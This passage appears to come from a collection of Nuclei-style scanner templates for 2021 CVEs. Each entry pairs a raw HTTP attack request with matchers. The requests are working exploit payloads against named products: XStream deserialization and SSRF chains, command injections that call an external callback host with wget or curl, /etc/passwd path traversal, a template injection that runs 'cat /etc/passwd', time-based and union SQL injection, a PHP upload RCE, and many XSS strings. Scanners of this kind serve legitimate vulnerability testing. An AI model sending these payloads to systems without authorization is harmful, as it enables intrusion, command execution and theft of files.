class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n","GET /queues/\"onmouseover=\"alert(document.domain)\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)","sidekiq"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-25094","info":{"name":"Wordpress Tatsubuilder <= 3.3.11 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=a8bfdd88f26f754c25496d0dd4962d38\n\n--a8bfdd88f26f754c25496d0dd4962d38\nContent-Disposition: form-data; name=\"action\"\n\nadd_custom_font\n--a8bfdd88f26f754c25496d0dd4962d38\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.zip\"\n\n{{zip('.{{filename}}.php','<?php echo base64_decode(\\'{{b64marker}}\\'); ?>')}}\n--a8bfdd88f26f754c25496d0dd4962d38--\n"],"matchers":[{"type":"word","part":"body","words":["\"name\":\"{{to_lower(filename)}}\"","\"status\":\"success"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/uploads/typehub/custom/{{to_lower(filename)}}/.{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["{{marker}}"]}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(echo {{string}}>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{string}}"]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41749","info":{"name":"CraftCMS SEOmatic - Server-Side Template Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}\nCache-Control: max-age=0\n\n","GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb\nCache-Control: max-age=0\n\n"],"skip-variables-check":true,"stop-at-first-match":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"/{{marker}}{{result}}\") || regex(\"root:.*:0:0:\", body_2)","contains_any(body, \"Craft CMS\", \"SEOmatic\" ,\"CRAFT_CSRF\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?m)^-----BEGIN PRIVATE KEY-----"]},{"type":"word","part":"header","words":["application/json","application/html"],"condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40651","info":{"name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, \"openSIS\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-29006","info":{"name":"rConfig 3.9.6 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /dashboard.php HTTP/1.1\nHost: {{Hostname}}\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_2","words":["rconfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-24915","info":{"name":"Contest Gallery < 13.1.0.6 - SQL injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WpUserId","Username","Usermail"],"condition":"and"},{"type":"word","part":"header","words":["text/csv","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open 